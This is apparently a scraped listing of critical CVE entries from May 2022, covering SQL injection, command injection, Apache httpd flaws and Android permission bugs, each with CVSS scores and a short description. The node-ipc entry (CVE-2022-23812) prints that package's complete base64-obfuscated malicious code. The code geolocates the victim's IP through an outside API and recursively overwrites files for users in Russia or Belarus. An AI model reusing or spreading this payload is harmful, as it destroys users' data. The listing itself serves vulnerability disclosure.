Total
15373 CVE
CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
---|---|---|---|---|---|
CVE-2022-29535 | 1 Zohocorp | 1 Manageengine Opmanager | 2022-05-17 | 7.5 HIGH | 9.8 CRITICAL |
Zoho ManageEngine OPManager through 125588 allows SQL Injection via a few default reports. | |||||
CVE-2022-0814 | 1 Ubigeo De Peru Para Woocommerce Project | 1 Ubigeo De Peru Para Woocommerce | 2022-05-17 | 7.5 HIGH | 9.8 CRITICAL |
The Ubigeo de Perú para Woocommerce WordPress plugin before 3.6.4 does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections | |||||
CVE-2022-29161 | 1 Xwiki | 1 Xwiki | 2022-05-17 | 6.8 MEDIUM | 9.8 CRITICAL |
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. The XWiki Crypto API will generate X509 certificates signed by default using SHA1 with RSA, which is not considered safe anymore for use in certificate signatures, due to the risk of collisions with SHA1. The problem has been patched in XWiki version 13.10.6, 14.3.1 and 14.4-rc-1. Since then, the Crypto API will generate X509 certificates signed by default using SHA256 with RSA. Administrators are advised to upgrade their XWiki installation to one of the patched versions. If the upgrade is not possible, it is possible to patch the module xwiki-platform-crypto in a local installation by applying the change exposed in 26728f3 and re-compiling the module. | |||||
CVE-2022-1013 | 1 Ays-pro | 1 Personal Dictionary | 2022-05-17 | 7.5 HIGH | 9.8 CRITICAL |
The Personal Dictionary WordPress plugin before 1.3.4 fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to a blind SQL injection vulnerability. | |||||
CVE-2022-0948 | 1 Pluginbazaar | 1 Order Listener For Woocommerce | 2022-05-17 | 7.5 HIGH | 9.8 CRITICAL |
The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection | |||||
CVE-2022-20120 | 1 Google | 1 Android | 2022-05-17 | 10.0 HIGH | 9.8 CRITICAL |
Product: AndroidVersions: Android kernelAndroid ID: A-203213034References: N/A | |||||
CVE-2022-22721 | 3 Apache, Debian, Fedoraproject | 3 Http Server, Debian Linux, Fedora | 2022-05-17 | 6.8 MEDIUM | 9.8 CRITICAL |
If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier. | |||||
CVE-2022-22720 | 3 Apache, Debian, Fedoraproject | 3 Http Server, Debian Linux, Fedora | 2022-05-17 | 7.5 HIGH | 9.8 CRITICAL |
Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling | |||||
CVE-2021-44790 | 6 Apache, Debian, Fedoraproject and 3 more | 6 Http Server, Debian Linux, Fedora and 3 more | 2022-05-17 | 7.5 HIGH | 9.8 CRITICAL |
A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier. | |||||
CVE-2022-29411 | 1 Hermit Project | 1 Hermit | 2022-05-16 | 7.5 HIGH | 9.8 CRITICAL |
SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin <= 3.1.6 on WordPress allows attackers to execute SQLi attack via (&id). | |||||
CVE-2022-27002 | 1 Commscope | 2 Arris Tr3300, Arris Tr3300 Firmware | 2022-05-16 | 10.0 HIGH | 9.8 CRITICAL |
Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the ddns function via the ddns_name, ddns_pwd, h_ddns?ddns_host parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
CVE-2022-23812 | 1 Node-ipic Project | 1 Node-ipic | 2022-05-16 | 10.0 HIGH | 9.8 CRITICAL |
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }; | |||||
CVE-2021-39658 | 1 Google | 1 Android | 2022-05-16 | 10.0 HIGH | 9.8 CRITICAL |
ismsEx service is a vendor service in unisoc equipment?ismsEx service is an extension of sms system service?but it does not check the permissions of the caller?resulting in permission leaks?Third-party apps can use this service to arbitrarily modify and set system properties?Product: AndroidVersions: Android SoCAndroid ID: A-207479207 | |||||
CVE-2021-39635 | 1 Google | 1 Android | 2022-05-16 | 9.4 HIGH | 9.1 CRITICAL |
ims_ex is a vendor system service used to manage VoLTE in unisoc devices?But it does not verify the caller's permissions?so that normal apps (No phone permissions) can obtain some VoLTE sensitive information and manage VoLTE calls.Product: AndroidVersions: Android SoCAndroid ID: A-206492634 | |||||
CVE-2021-41081 | 1 Zohocorp | 1 Manageengine Network Configuration Manager | 2022-05-16 | 7.5 HIGH | 9.8 CRITICAL |
Zoho ManageEngine Network Configuration Manager before ??125465 is vulnerable to SQL Injection in a configuration search. | |||||
CVE-2021-41080 | 1 Zohocorp | 1 Manageengine Network Configuration Manager | 2022-05-16 | 7.5 HIGH | 9.8 CRITICAL |
Zoho ManageEngine Network Configuration Manager before ??125465 is vulnerable to SQL Injection in a hardware details search. | |||||
CVE-2021-26334 | 3 Amd, Linux, Microsoft | 3 Amd Uprof, Linux Kernel, Windows | 2022-05-16 | 9.0 HIGH | 9.9 CRITICAL |
The AMDPowerProfiler.sys driver of AMD ?Prof tool may allow lower privileged users to access MSRs in kernel which may lead to privilege escalation and ring-0 code execution by the lower privileged user. | |||||
CVE-2020-15175 | 1 Glpi-project | 1 Glpi | 2022-05-16 | 6.4 MEDIUM | 9.1 CRITICAL |
In GLPI before version 9.5.2, the `?pluginimage.send.php?` endpoint allows a user to specify an image from a plugin. The parameters can be maliciously crafted to instead delete the .htaccess file for the files directory. Any user becomes able to read all the files and folders contained in “/files/”. Some of the sensitive information that is compromised are the user sessions, logs, and more. An attacker would be able to get the Administrators session token and use that to authenticate. The issue is patched in version 9.5.2. | |||||
CVE-2014-4982 | 1 Xorux | 1 Lpar2rrd | 2022-05-16 | 7.5 HIGH | 9.8 CRITICAL |
LPAR2RRD ? 4.53 and ? 3.5 has arbitrary command injection on the application server. | |||||
CVE-2022-1154 | 1 Vim | 1 Vim | 2022-05-16 | 7.5 HIGH | 9.8 CRITICAL |
Use after free in utf_ptr2char in GitHub repository vim/vim prior to 8.2.4646. |